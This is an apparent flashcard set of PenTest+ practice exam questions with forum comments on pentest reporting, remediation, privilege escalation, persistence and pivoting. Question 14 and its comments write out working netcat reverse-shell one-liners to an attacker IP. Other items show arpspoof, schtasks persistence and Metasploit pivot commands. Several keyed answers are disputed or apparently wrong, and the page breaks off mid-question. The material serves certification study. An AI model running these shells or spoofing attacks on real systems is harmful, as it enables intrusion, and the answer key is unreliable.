Actual Exam Questions Flashcards

1
Q

A penetration tester has been asked to conduct a penetration test on a REST-based web service. Which of the following items is required?

A. The latest vulnerability scan results

B. A list of sample application requests

C. An up-to-date list of possible exploits

D. A list of sample test accounts

A

B. A list of sample application requests

100%

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

A penetration tester successfully exploits a DMZ server that appears to be listening on an outbound port. The penetration tester wishes to forward that traffic back to a device. Which of the following are the BEST tools to use for this purpose? (Choose two.)

A. Tcpdump

B. Nmap

C. Wireshark

D. SSH

E. Netcat

F. Cain and Abel

A

D. SSH

E. Netcat

100%

mr_robot

4 months ago

C and D - PenTest+ Practice Tests Book - SYBEX In this scenario, the best options are SSH and Wireshark. Secure Shell (SSH) provides secure encrypted connections between systems. SSH provides remote shell access via an encrypted connection. SSH is used for secure command-line access to systems, typically via TCP port 22, and is found on devices and systems of all types. Because SSH is so common, testing systems that provide an SSH service is a very attractive option for a penetration tester. Wireshark is a protocol analyzer that allows penetration testers to eavesdrop on and dissect network traffic. Wireshark also allows for capturing network traffic from wireless networks.

upvoted 3 times

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

A company performed an annual penetration test of its environment. In addition to several new findings, all of the previously identified findings persisted on the latest report. Which of the following is the MOST likely reason?

A. Infrastructure is being replaced with similar hardware and software.

B. Systems administrators are applying the wrong patches.

C. The organization is not taking action to remediate identified findings.

D. The penetration testing tools were misconfigured.

A

C. The organization is not taking action to remediate identified findings.

100%

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

A penetration test was performed by an on-staff junior technician. During the test, the technician discovered the web application could disclose an SQL table with user account and password information. Which of the following is the MOST effective way to notify management of this finding and its importance?

A. Document the findings with an executive summary, recommendations, and screenshots of the web application disclosure.

B. Connect to the SQL server using this information and change the password to one or two non-critical accounts to demonstrate a proof–of-concept to management.

C. Notify the development team of the discovery and suggest that input validation be implemented with a professional penetration testing company.

D. Request that management create an RFP to begin a formal engagement with a professional penetration testing company.

A

A. Document the findings with an executive summary, recommendations, and screenshots of the web application disclosure.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

A penetration tester reports an application is only utilizing basic authentication on an Internet-facing application. Which of the following would be the BEST remediation strategy?

A. Enable HTTP Strict Transport Security.

B. Enable a secure cookie flag.

C. Encrypt the communication channel.

D. Sanitize invalid user input.

A

A. Enable HTTP Strict Transport Security

100%

D1960

5 months, 3 weeks ago

D. Sanitize invalid user input? Even if you enable HTTP Strict Transport Security, the application is still using basic authentication. The problem is with the application, not the communication channel. Basic authentication may not stop an sql injection.

upvoted 1 times

D1960

4 months, 2 weeks ago

I was wrong, the correct answer is A. https://en.wikipedia.org/wiki/Basic_access_authentication

upvoted 1 times

jon34thna

5 months, 2 weeks ago

SYBEX | Pentest Questions | Chapter 5 Reporting and Communication | Question 125 A. Enable HTTP Strict Transport Security

upvoted 1 times

mr_robot

4 months, 1 week ago

PenTest+ Practice Tests Book A. - In this scenario, the tester should recommend that the client enable HTTP Strict Transport Security (HSTS). The HSTS response header lets a website tell browsers that it should only be accessed using HTTPS, instead of using HTTP. It is an opt-in security enhancement that is specified by a web application through the use of a special response header. Once a supported browser receives this header, that browser will prevent any communications from being sent over HTTP to the specified domain and will instead send all communications over HTTPS.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

A penetration tester was able to retrieve the initial VPN user domain credentials by phishing a member of the IT department. Afterward, the penetration tester obtained hashes over the VPN and easily cracked them using a dictionary attack. Which of the following remediation steps should be recommended? (Select
THREE).

A. Mandate all employees take security awareness training.

B. Implement two-factor authentication for remote access.

C. Install an intrusion prevention system.

D. Increase password complexity requirements.

E. Install a security information event monitoring solution.

F. Prevent members of the IT department from interactively logging in as administrators.

G. Upgrade the cipher suite used for the VPN solution.

A

A. Mandate all employees take security awareness training.

B. Implement two-factor authentication for remote access.

D. Increase password complexity requirements.

100%

A, C, G

A, D, G

Droid2000

11 months, 2 weeks ago

i think A should be included in ans

upvoted 4 times

AnAverageUser3656

9 months, 1 week ago

I agree with droid2000, “A” should be included and omit “G”. Improving employee education is a good way to mitigate phishing attacks.

upvoted 4 times

cooljane

8 months, 2 weeks ago

I believe correct answer are: A, D, G.

upvoted 2 times

phatboy

8 months, 1 week ago

It isn’t G, the cyphers are irrelevant, access was gained with phished credentials. The answer should definitely include B as this would have prevented access. I think the answer is either BDA or BDF.

upvoted 3 times

amankry

7 months, 3 weeks ago

A B D is the correct answer

upvoted 5 times

sharifengg

7 months, 3 weeks ago

A B D is the correct answer

upvoted 5 times

jon34thna

5 months, 2 weeks ago

SYBEX | PenTest+™ Practice Test | Chapter 5 | Reporting and Communication | Question 124 password complexity requirements. two-factor authentication for remote access. all employees take security awareness training. A | B | D

upvoted 3 times

mr_robot

3 months, 3 weeks ago

Actually the Sybex book states A | D | G. “In this scenario, the tester should recommend that the client increase their password complexity requirements since the tester was able to crack them by using a dictionary attack. The tester should also recommend that all employees take security awareness training, since it was a member of the IT department who gave up pertinent information when the tester used a phishing technique. The tester should also recommend upgrading the cipher suite that is used for the VPN solution. A cipher suite is a set of algorithms that help secure network connections that uses Transport Layer Security (TLS) or Secure Socket Layer (SSL). The set of algorithms that cipher suites usually contain includes a key exchange algorithm, a bulk encryption algorithm, and a message authentication code (MAC) algorithm.”

upvoted 1 times

mr_robot

1 month, 4 weeks ago

…but, I would go for A B D.

upvoted 1 times

ebot

1 month, 4 weeks ago

I would say ADG, Phishing requires employee awareness training, weak password would require increase complexity and the cipher suite needs to be upgraded. Should not be able to “easily” crack them. Possibly weak SSL or TLS . Source: Sybex page 163 & 166 “Insecure Ciper Use”

upvoted 1 times

mr_robot

1 month, 2 weeks ago

ADG seems to be the best even though MFA always go together using strong passwords but, once you use a complex password together with an AES 256-bit encryption for instance, it would be almost impossible to crack it. https://securitygladiators.com/vpn-encryption-guide/#Ciphers https://securityboulevard.com/2020/05/aes-encryption-a-closer-look-at-advanced-encryption-standards/

upvoted 1 times

kabwitte

1 month ago

I don’t think that upgrading the cipher suite would change anything because the attacker was successful using social engineering (Phishing). The level of security really doesn’t mean much if the attacker is able to con their way through with a little bit of charm. As a result, I would go with ABD like Boblee.

upvoted 1 times

boblee

1 month, 3 weeks ago

The answer is A B D.

upvoted 1 times

Leonar

3 weeks, 1 day ago

People, Process, Technology. A - People B - Technology D - Process

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

During testing, a critical vulnerability is discovered on a client’s core server. Which of the following should be the NEXT action?

A. Disable the network port of the affected service.

B. Complete all findings, and then submit them to the client.

C. Promptly alert the client with details of the finding.

D. Take the target offline so it cannot be exploited by an attacker.

A

C. Promptly alert the client with details of the finding

100%

phatboy

10 months, 3 weeks ago

I believe the answer should be C

upvoted 3 times

amankry

7 months, 3 weeks ago

C is correct answer

upvoted 3 times

D1960

5 months, 3 weeks ago

If it’s a critical vulnerability, shouldn’t you disable the port right away? Maybe A is the correct answer?

upvoted 1 times

jon34thna

5 months, 2 weeks ago

‘C’ critical vunerability is a reason to stop pentest and call the client. Not A because you are not the Network Administartor

upvoted 4 times

mr_robot

4 months, 1 week ago

PenTest+ Practice Tests Book - SYBEX C. - In this scenario, since the penetration tester discovered a critical vulnerability, the tester should immediately alert the client with the details of the findings.

upvoted 2 times

maps7

3 months, 3 weeks ago

I will go with C coz as Penetester your job is to report your findings and let the administrator make decisions. Companies have the risk that they have accepted so it will be wise to promptly alert the administrator of your findings and then only them can make a decision

upvoted 3 times

Leonar

3 weeks, 1 day ago

Why don’t we cut off the powerline? :) The best answer is C

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

An energy company contracted a security firm to perform a penetration test of a power plant, which employs ICS to manage power generation and cooling. Which of the following is a consideration unique to such an environment that must be made by the firm when preparing for the assessment?

A. Selection of the appropriate set of security testing tools

B. Current and load ratings of the ICS components

C. Potential operational and safety hazards

D. Electrical certification of hardware used in the test

A

A. Selection of the appropriate set of security testing tools

100%

mr_robot

4 months, 1 week ago

Probably A?

upvoted 1 times

mr_robot

3 months, 3 weeks ago

https://resources.infosecinstitute.com/pentesting-ics-systems/#gref

upvoted 1 times

D1960

3 months ago

With the possible exception of PLCSCAN. None of those tools are unique to ICS. However, heath and safety issues at a powerplant would be unique.

upvoted 1 times

D1960

3 months, 1 week ago

Maybe C? Tools are always an issue. But a power plant has health and safety issues beyond that of a typical office.

upvoted 3 times

mr_robot

2 months, 1 week ago

I would agree with you. A selection of the appropriate set of security testing tools is already part of any pentesting assessment according to the type of company and test you need to do but, when asked “Which of the following is a consideration unique to such an environment”, means that the pentest has also to consider and assess a potential operational and safety hazards present onsite. http://www.fedco.co.id/vulnerability-assessment-and-penetration-testing-in-online-scada-ics-environment-webinar/

upvoted 2 times

boblee

1 month, 3 weeks ago

The answer is A. Because you would have to more research to find tools that can test that specific scada system.

upvoted 3 times

kabwitte

1 month ago

I’m going for A. Reason? A single TCP or UDP port scan against a SCADA component can cause catastrophic damage of mass proportion. Before testing SCADA systems, pentesters should know the proper tools to use to ensure the testing provides adequate coverage and reduces the likelihood of knocking over critical services. Nutting, Raymond. CompTIA PenTest+ Certification All-in-One Exam Guide (Exam PT0-001) (p. 83). McGraw-Hill Education. Kindle Edition.

upvoted 2 times

Leonar

3 weeks, 1 day ago

It is always human life in the first place. C !

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

A client has requested an external network penetration test for compliance purposes. During discussion between the client and the penetration tester, the client expresses unwillingness to add the penetration tester’s source IP addresses to the client’s IPS whitelist for the duration of the test. Which of the following is the
BEST argument as to why the penetration tester’s source IP addresses should be whitelisted?

A. Whitelisting prevents a possible inadvertent DoS attack against the IPS and supporting log-monitoring systems.

B. Penetration testing of third-party IPS systems often requires additional documentation and authorizations; potentially delaying the time-sensitive test.

C. IPS whitelisting rules require frequent updates to stay current, constantly developing vulnerabilities and newly discovered weaknesses.

D. Testing should focus on the discovery of possible security issues across all in-scope systems, not on determining the relative effectiveness of active defenses such as an IPS.

A

D. Testing should focus on the discovery of possible security issues across all in-scope systems, not on determining the relative effectiveness of active defenses such as an IPS.

100%

mr_robot

4 months, 1 week ago

PenTest+ Practice Tests Book - SYBEX D. - Whitelisting testers in intrusion prevention systems (IPSs), web application firewalls (WAFs), and other security devices will allow them to perform their tests without being blocked. For a white box test, this means that testers won’t spend time waiting to be unblocked when security measures detect their efforts. Black box and red team tests are more likely to result in testers being blacklisted or blocked by security measures. In this scenario, the penetration tester should tell the client that testing should focus on the discovery of potential security issues through all in-scope systems and not just on determining the effectiveness of active defenses such as the IPS.

upvoted 2 times

Leonar

3 weeks, 1 day ago

D is okay, but the best rationale is to let them know that the threat actor is not the only outsiders but also insiders that could be whitelisted

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

A penetration tester is able to move laterally throughout a domain with minimal roadblocks after compromising a single workstation. Which of the following mitigation strategies would be BEST to recommend in the report? (Select THREE).

A. Randomize local administrator credentials for each machine.

B. Disable remote logons for local administrators.

C. Require multifactor authentication for all logins.

D. Increase minimum password complexity requirements.

E. Apply additional network access control.

F. Enable full-disk encryption on every workstation.

G. Segment each host into its own VLAN.

A

C. Require multifactor authentication for all logins.

D. Increase minimum password complexity requirements.

E. Apply additional network access control.

100%

mr_robot

4 months, 1 week ago

PenTest+ Practice Tests Book - SYBEX C, D and F - In this situation, since the tester was able to compromise a single workstation and is able to move laterally through the network, the best recommendations to give the client would be the following: - Use multifactor authentication. Multifactor authentication (MFA) is an authentication method in which a computer user is granted access only after successfully presenting two or more pieces of evidence (or factors) to an authentication mechanism. - Increase minimum password complexity. Complex passwords use different types of characters in unique ways to increase security, making it harder for an attacker to crack. - Enable full-disk encryption. Full-disk encryption (FDE) is encryption at the hardware level. FDE works by automatically converting data on a hard drive into a form that cannot be understood by anyone who doesn’t have the key to “undo” the conversion.

upvoted 3 times

maps7

3 months, 2 weeks ago

but F how does disk encryption stops an attacker from the lateral movement?

upvoted 1 times

mr_robot

1 month, 3 weeks ago

You are right. I guess E would be a better option even though you can easily bypass NAC by spoofing your MAC address with a deskphone for instace - https://resources.infosecinstitute.com/nac-hacking-bypassing-network-access-control/ But A seems to be a valid option too as “Microsoft’s Local Administrator Password solution (LAPS) can have drastic impact in the fight against lateral movement techniques. It is an effective way to prevent some potential lateral movement or privilege escalation within your environment.” https://blog.stealthbits.com/running-laps-in-the-race-to-security/ https://blog.stealthbits.com/3-zero-cost-tactics-make-difficult-attackers-move-laterally/ But it can also be bypassed just like any security defense: https://www.youtube.com/watch?v=vaov8F-0dQ8 Anyway I will stick with CDE.

upvoted 1 times

D1960

3 months, 2 weeks ago

Tough one. C & D for sure. But I am not sure if E or F is better. I think I will go with CDE. Encrypting a disk does not seem to address the problem that is presented - being able easily move from one host to another.

upvoted 1 times

boblee

1 month, 3 weeks ago

The answer is CDE.

upvoted 1 times

kabwitte

1 month ago

I would go with C, D, G. I believe that the reason the attacker was able to move laterally without any obstacles is because all the hosts were on the same network. It takes more work to move laterally if these compromised hosts were on different networks. To accomplish such a task, a virtual LAN (VLAN) needs to be implemented. This would make each host look like they are on they own separate network. Thus, when the attacker compromises the initial host, the others won’t be readily available or seen.

upvoted 1 times

kabwitte

1 month ago

I think I have a change of heart on this one. I would go for CDE. Implementing a VLAN for each host in that ONE domain is a bit extreme for a recommendation. The easier approach would be additional network access controls which would apply to all hosts within that domain.

upvoted 1 times

Leonar

3 weeks, 1 day ago

G must be involved in as the top solution

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

Which of the following is the reason why a penetration tester would run the chkconfig –del servicename command at the end of an engagement?

A. To remove the persistence

B. To enable persistence

C. To report persistence

D. To check for persistence

A

A. To remove the persistence

100%

mr_robot

4 months, 1 week ago

PenTest+ Practice Tests Book - SYBEX A. chkconfig is a tool for managing which run levels a service will run at. chkconfig can be used to view or change the run level of a service. Using chkconfig –del will set the named service to not run at the current run level and will remove the persistence.

upvoted 5 times

noura_141

3 weeks, 2 days ago

Your comments are very helpful thank you

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a user’s home folder titled ‘‘changepass.”
-sr-xr-x 1 root root 6443 Oct 18 2017 /home/user/changepass
Using “strings” to print ASCII printable characters from changepass, the tester notes the following:
$ strings changepass
exit
setuid
strcmp

GLIBC_2.0 -

ENV_PATH -
%s/changepw
malloc
strlen
Given this information, which of the following is the MOST likely path of exploitation to achieve root privileges on the machine?

A. Copy changepass to a writable directory and export the ENV_PATH environmental variable to the path of a token-stealing binary titled changepw. Then run changepass.

B. Create a copy of changepass in the same directory, naming it changepw. Export the ENV_PATH environmental variable to the path ‘/home/user/’. Then run changepass.

C. Export the ENV_PATH environmental variable to the path of a writable directory that contains a token-stealing binary titled changepw. Then run changepass.

D. Run changepass within the current directory with sudo after exporting the ENV_PATH environmental variable to the path of ‘/usr/local/bin’.

A

D. Run changepass within the current directory with sudo after exporting the ENV_PATH environmental variable to the path of ‘/usr/local/bin’.

100%

phatboy

8 months, 1 week ago

How can the attacker run a command with sudo if they only have low-privilege access?

upvoted 1 times

Marshmallow

7 months, 1 week ago

The SUID is set for the write permission and that’s how the user can do SUDO.

upvoted 1 times

Evens_chokoe

5 months, 3 weeks ago

the attacker is running sudo just for Privilege escalation technique

upvoted 1 times

mr_robot

3 months, 3 weeks ago

I would go for D. - https://www.pentestpartners.com/security-blog/exploiting-suid-executables/

upvoted 1 times

mr_robot

1 month, 2 weeks ago

The tester needs to create another dodgy copy of changepw script and move it to another directory (ex: \tmp) and not changepass initial executable. Export ENV_PATH to the chosen diretory of the dodgy script (ex:\temp) and then run changepass executable. “ChangePW is a freeware command line tool to set a password, display the current userAccountControl password flags, and enable or disable an account.” https://www.itprotoday.com/compute-engines/jsi-tip-9267-changepw-freeware-command-line-tool-set-password-display-current

upvoted 1 times

NoImDirtyDan

3 weeks, 2 days ago

C is what you are describing.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

A malicious user wants to perform a MITM attack on a computer. The computer network configuration is given below:

IP: 192.168.1.20 -

NETMASK: 255.255.255.0 -

DEFAULT GATEWAY: 192.168.1.254 -

DHCP: 192.168.1.253 -
DNS: 192.168.10.10, 192.168.20.10
Which of the following commands should the malicious user execute to perform the MITM attack?

A. arpspoof -c both -r -t 192.168.1.1 192.168.1.20

B. arpspoof -t 192.168.1.20 192.168.1.254

C. arpspoof -c both -t 192.168.1.20 192.168.1.253

D. arpspoof -r -t 192.168.1.253 192.168.1.20

A

B. arpspoof -t 192.168.1.20 192.168.1.254

100%

mr_robot

4 months, 1 week ago

PenTest+ Practice Tests Book - SYBEX B. - A man-in-the-middle attack intercepts a communication between two systems. ARP stands for Address Resolution Protocol, and it allows the network to translate IP addresses into MAC addresses. In this scenario, the attacker wants to perform a manin- the-middle attack; it is done by performing arpspoof -t . The -t switch specifies a particular host to ARP poison.

upvoted 3 times

NoImDirtyDan

3 weeks, 4 days ago

Correct answer is D. You must use -r to capture traffic in both directions, creating a true MITM.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain a reverse shell back to the attacking machine at 192.168.1.5. Which of the following are possible ways to do so? (Select TWO).

A. nc 192.168.1.5 44444

B. nc -nlvp 44444 -e /bin/sh

C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 44444>/tmp/f

D. nc -e /bin/sh 192.168.1.5 44444

E. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 444444>/tmp/f

F. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.5.1 44444>/tmp/f

A

C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 44444>/tmp/f

D. nc -e /bin/sh 192.168.1.5 44444

100%

zgwy

11 months, 2 weeks ago

Wrong…C and D http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

upvoted 2 times

D1960

5 months, 3 weeks ago

I also think the correct answers are C and D. According to this site: https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/ This should work: # nc 192.168.1.5 44444 -e /bin/sh Note that D is very similar: nc -e /bin/sh 192.168.1.5 44444 - A is probably wrong because no shell is executed - B is probably wrong because no IP is not specified - E is wrong because there is no 444444 port (too high a port) - F is wrong because the IP is 192.168.5.1 not 192.168.1.5

upvoted 2 times

deathfrom

3 months, 3 weeks ago

I think there are 3 correct answers here. B,C & D. B is needed to create a nc listener on the attackers machine. C will work when the -e option is not available on for nc. D work because the -e option is available. More than likely it will be C/D

upvoted 1 times

mr_robot

1 month, 2 weeks ago

The question asks two possible ways to gain a reverse shell back to the attacking machine at 192.168.1.5. So the correct answers would be C and D. You can use either one to gain a reverse shell. B (nc -nlvp 44444 -e /bin/sh) is just a listener from from the remote machine used for a bind shell. Bind Shell - have the listener running on the target and the attacker connect to the listener in order to gain a remote shell. nc -nvlp 5555 -e /bin/bash - setting up a listener from the remote machine nc -nv 192.168.10.10 5555 - use our machine to connect to it remotely Reverse Shell - have the listener running on the attacker and the target connecting to the attacker with a shell. nc -nvlp 5555 - setting up a listener from the attacker machine nc -nv 192.168.20.20 5555 -e /bin/bash - use the target machine to connect to our machine http://stuffjasondoes.com/2018/07/18/bind-shells-and-reverse-shells-with-netcat/ The thing is everywhere I see this question B and C are correct so what we need to do to pass the exam, trust our own instincts/experience or what Comptia believes is correct? Is it worth to pay for the Comptia CertMaster Practice in order to verify all those doubtful questions?

upvoted 1 times

boblee

1 month, 2 weeks ago

CertMaster does not have these questions. I have certmaster.

upvoted 1 times

NoImDirtyDan

4 weeks ago

The correct answers are C & D. Source: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

A penetration tester has compromised a Windows server and is attempting to achieve persistence. Which of the following would achieve that goal?

A. schtasks.exe /create/tr “powershell.exe” Sv.ps1 /run

B. net session server | dsquery -user | net use c$

C. powershell && set-executionpolicy unrestricted

D. reg save HKLM\System\CurrentControlSet\Services\Sv.reg

A

A. schtasks.exe /create/tr “powershell.exe” Sv.ps1 /run100%

phatboy

8 months ago

Correct answer is A. https://pentestlab.blog/2019/11/04/persistence-scheduled-tasks/

upvoted 3 times

mr_robot

4 months, 3 weeks ago

According to PenTest+ Practice Tests Book - SYBEX D. - reg save saves a copy of specified subkeys, entries, and values of the registry in a specified file. A file with the .reg file extension is a registration file used by the Windows Registry. These files can contain hives, keys, and values.

upvoted 1 times

D1960

3 months, 2 weeks ago

What good is saving the registry entries, if you cannot restore them? If you lose your access to the system, how do you restore your access by restoring part of the registry?

upvoted 1 times

mr_robot

3 months ago

I agree with you however the command from schtasks is incomplete. For the attacker to maintain persistence during logon he would need to add the /sc onlogon switch to the command: https://rasor.wordpress.com/2013/08/12/powershell-scheduling-a-task/ For that reason, I think D would not the the best answer but the least incorrect: https://rasor.wordpress.com/2013/08/12/powershell-scheduling-a-task/ “HKLM\System\CurrentControlSet\services The keys located here get loaded by the Service Controller at various times during the operation of the computer. Some are loaded at system startup and others are loaded on demand or when triggered by other events. The attackers want to load at startup so that even if no user logs in they can connect to the computer.”

upvoted 1 times

mr_robot

1 month, 3 weeks ago

Also, once you modify the registry you can add a dodgy service to be started at logon and maintain persistence to the device: https://threatvector.cylance.com/en_us/home/windows-registry-persistence-part-1-introduction-attack-phases-and-windows-services.html https://threatvector.cylance.com/en_us/home/windows-registry-persistence-part-2-the-run-keys-and-search-order.html

upvoted 1 times

mr_robot

1 month, 1 week ago

Best answer is A. You have to use “reg add” instead of “reg save” in order to add a new subkey or entry to the registry.

upvoted 2 times

khuno

4 weeks, 1 day ago

Examples reg add \ABC\HKLM\Software\MyCo reg save HKLM\Software\MyCo\MyApp AppBkUp.hiv

upvoted 1 times

merdoso

3 months, 2 weeks ago

Strange— agree about A. The issue is that you could get persistance with both… but reg key like this is strange.

upvoted 1 times

DaDude

3 months, 2 weeks ago

The schtasks is not complete, /run - this is an on demand (you would need to be on the machine to run this) if you lost connection you would not be able to run this again

upvoted 1 times

D1960

2 months ago

But maybe you would not have to run it again? It depends on what the powershell script does.

upvoted 1 times

boblee

1 month, 3 weeks ago

The answer is A in this context. SYBEX is bad.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

Which of the following commands would allow a penetration tester to access a private network from the Internet in Metasploit?

A. set rhost 192.168.1.10

B. run autoroute -s 192.168.1.0/24

C. db_nmap -iL /tmp/privatehosts.txt

D. use auxiliary/server/socks4a

A

D. use auxiliary/server/socks4a

100%

D1960

4 months, 2 weeks ago

Maybe: B. run autoroute -s 192.168.1.0/24 ? Reference: https://www.offensive-security.com/metasploit-unleashed/Pivoting/

upvoted 1 times

mr_robot

2 months, 3 weeks ago

Agree with you. “Preparing to pivot across a network requires us to first establish a Meterpreter session on the victim machine. From there, we can use the autoroute script to enable access to the non-routable subnet” - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/server/socks4a.md run autoroute -s 192.168.1.0/24 - Add a route to 192.168.1.0/24 (establish a Meterpreter session on the victim machine - https://www.offensive-security.com/metasploit-unleashed/Pivoting/ use auxiliary/server/socks4a - Setup and run a socks proxy over meterpreter, this module provides a socks4a proxy server that uses the builtin Metasploit routing to relay connections. - https://www.offensive-security.com/metasploit-unleashed/proxytunnels/ https://nullsweep.com/pivot-cheatsheet-for-pentesters/ set rhost 192.168.1.10 - Set the target address db_nmap -iL /tmp/privatehosts.txt - Use nmap and place results in database

upvoted 1 times

kabwitte

4 weeks, 1 day ago

Yup, I believe you are correct sir! The link you provided actually gives the answer. :)

upvoted 1 times

mr_robot

4 months, 2 weeks ago

PenTest+ Practice Tests Book - SYBEX D. Metasploit is a tool for the development of exploits and the testing of them on live targets. The socks4a auxiliary is a module from within the framework. This auxiliary module provides a proxy server that uses Metasploit Framework routing to relay connections. So, using the use auxiliary/server/socks4a module allows a tester to access a private network from the Internet.

upvoted 4 times

mr_robot

2 months, 3 weeks ago

Don’t think this is right. Probably A is correct. - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/server/socks4a.md

upvoted 1 times

khuno

1 month, 3 weeks ago

It will be socks4a that will create a session through the internet. (the question says access the network.) It will not be autoroute because that will help you pivot to another computer in the network. Meaning you are already in.

upvoted 2 times

kabwitte

4 weeks, 1 day ago

I would go with B: Preparing to pivot across a network requires us to first establish a Meterpreter session on the victim machine. From there, we can use the autoroute script to enable access to the non-routable subnet: meterpreter > run autoroute -s 10.0.0.0/24 Note: An non-routable address is a private network address. Non-routable: https://docs.actian.com/dataconnect/11.1/index.html#page/User/Non-routable_Addresses.htm

upvoted 1 times

kabwitte

4 weeks, 1 day ago

Sorry, I missed a source for the autoroute script: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/server/socks4a.md

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
17
Q

A penetration tester was able to enter an SQL injection command into a text box and gain access to the information store on the database. Which of the following is the BEST recommendation that would mitigate the vulnerability?

A. Randomize the credentials used to log in.

B. Install host-based intrusion detection.

C. Implement input normalization.

D. Perform system hardening.

A

D. Perform system hardening.

D1960

5 months, 3 weeks ago

This is an attack on an application, not a host. There might be some sort of host hardening that would help, maybe a WAF? But I cannot help but wonder if C is a better answer? I think input normalization would sanitize the input, which would prevent an SQL injection.

upvoted 2 times

jon34thna

5 months, 2 weeks ago

Yep difficult call here. But I think D is correct. If ‘C’ used the word Sanitization or Parameterized query I may be tempted but ‘Normalization’ ….? I would stick with D.

upvoted 1 times

mr_robot

4 months, 1 week ago

PenTest+ Practice Tests Book D. - System hardening, also known as operating system hardening, helps minimize security vulnerabilities. The purpose of system hardening is to get rid of as many security risks as possible. This is usually done by removing all nonessential software programs and utilities from the computer. The goal of systems hardening by removing unused programs, accounts functions, applications, ports, permissions, access, etc., is that attackers have fewer opportunities to gain access to your network. There are several types of system hardening activities. They include the following: Application hardening Operating system hardening Server hardening Database hardening Network hardening

upvoted 2 times

mr_robot

2 months ago

It seems Input Validation and Sanitisation are the first line of defense against SQL injections, even though Parameterised queries are better but in this scenario I think “the BEST recommendation” would be to do system hardening. “The risks associated with code injections are escalated when the databases or operating system tied to the Web applications under attack are weak due to poor patching and configuration. In addition, the system administrator should be responsible for hardening the underlying database and the operating system by disabling unnecessary services and functionality.” https://wikisites.cityu.edu.hk/sites/netcomp/articles/Pages/Hardening%20Steps%20to%20Mitigate%20Code%20Injection.aspx https://resources.infosecinstitute.com/sql-injection-protection-cloud-systems/

upvoted 1 times

boblee

1 month, 3 weeks ago

The answer is C.

upvoted 2 times

khuno

4 weeks, 1 day ago

https://www.essentialsql.com/get-ready-to-learn-sql-database-normalization-explained-in-simple-english/ Normalization is all about avoiding redundancy. “There are three main reasons to normalize a database. The first is to minimize duplicate data, the second is to minimize or avoid data modification issues, and the third is to simplify queries. “ I’ll go for D.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
18
Q

A penetration tester wants to launch a graphic console window from a remotely compromised host with IP 10.0.0.20 and display the terminal on the local computer with IP 192.168.1.10. Which of the following would accomplish this task?

A. From the remote computer, run the following commands: export XHOST 192.168.1.10:0.0 xhost+ Terminal

B. From the local computer, run the following command: ssh -L4444:127.0.0.1:6000 -X user@10.0.0.20 xterm

C. From the remote computer, run the following command: ssh -R6000:127.0.0.1:4444 -p 6000 user@192.168.1.10 “xhost+; xterm”

D. From the local computer, run the following command: nc -l -p 6000 Then, from the remote computer, run the following command: xterm | nc 192.168.1.10 6000

A

A. From the remote computer, run the following commands: export XHOST 192.168.1.10:0.0 xhost+ Terminal

100%

xxdxx

6 months, 1 week ago

When I tried these commands, only B worked successfully

upvoted 3 times

jon34thna

5 months, 2 weeks ago

I don’t think A. serveral tests and I think it is B or D

upvoted 1 times

GOKU1984

4 months, 4 weeks ago

B .. Is the only work that worked …D brought up an x term window of the of the same terminal you were trying from.

upvoted 1 times

mr_robot

4 months, 1 week ago

Which Linux distro did you guys test the commands from B? I used the latest Kali but could not make it work. I got connection refused even though I had enabled SSH.

upvoted 1 times

D1960

3 months, 1 week ago

According to ssh man pages: -L [bind_address:]port:host:hostport : Specifies that connections to the given TCP port or Unix socket on the local (client) host are to be forwarded to the given host and port, or Unix socket, on the remote side. -X : Enables X11 forwarding

upvoted 1 times

mr_robot

1 month, 4 weeks ago

Another example for B: https://www.howtogeek.com/168145/how-to-use-ssh-tunneling/ https://explainshell.com/explain?cmd=ssh+-L4444%3A127.0.0.1%3A6000+-X+user%4010.0.0.20+xterm Commands from A seem incomplete: https://www.lifewire.com/linux-command-xhost-4093456

upvoted 1 times

khuno

1 month, 3 weeks ago

isn’t the key here is “graphic console window”. the other options are terminal only?

upvoted 1 times

khuno

4 weeks, 1 day ago

never mind, got confused with gui

upvoted 1 times

khuno

4 weeks, 1 day ago

I will go with D, just because the local IP on B is wrong

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
19
Q

Which of the following properties of the penetration testing engagement agreement will have the LARGEST impact on observing and testing production systems at their highest loads?

A. Creating a scope of the critical production systems
B. Setting a schedule of testing access times
C. Establishing a white-box testing engagement
D. Having management sign off on intrusive testing

A

B. Setting a schedule of testing access times

100%

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
20
Q

A penetration tester has a full shell to a domain controller and wants to discover any user account that has not authenticated to the domain in 21 days. Which of the following commands would BEST accomplish this?

A. dsrm -users “DN=company.com; OU=hq CN=users”
B. dsuser -name -account -limit 3
